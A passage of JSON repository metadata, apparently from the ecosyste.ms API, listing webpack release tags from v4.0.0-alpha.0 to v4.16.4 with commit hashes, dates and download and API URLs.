v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.1/manifests"},{"name":"v4.10.0","sha":"ba703401d580ad623af17fe96ed98b4d801e0313","kind":"tag","published_at":"2018-05-28T23:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.0/manifests"},{"name":"v4.9.2","sha":"317fb353518179c50342b1ac826d393a85b5903e","kind":"tag","published_at":"2018-05-28T20:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.2/manifests"},{"name":"v4.9.1","sha":"94cd709b06ffc7071b3505a746f0bb17fb7e3c33","kind":"tag","published_at":"2018-05-25T21:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.1/manifests"},{"name":"v4.9.0","sha":"bb0731d7897fb8a7369efd9d2f9bf0a8c08d546d","kind":"tag","published_at":"2018-05-25T20:17:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.9.0/manifests"},{"name":"v4.8.3","sha":"9a72294918064d6b976538adf808808de948585f","kind":"tag","published_at":"2018-05-12T20:56:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.3/manifests"},{"name":"v4.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%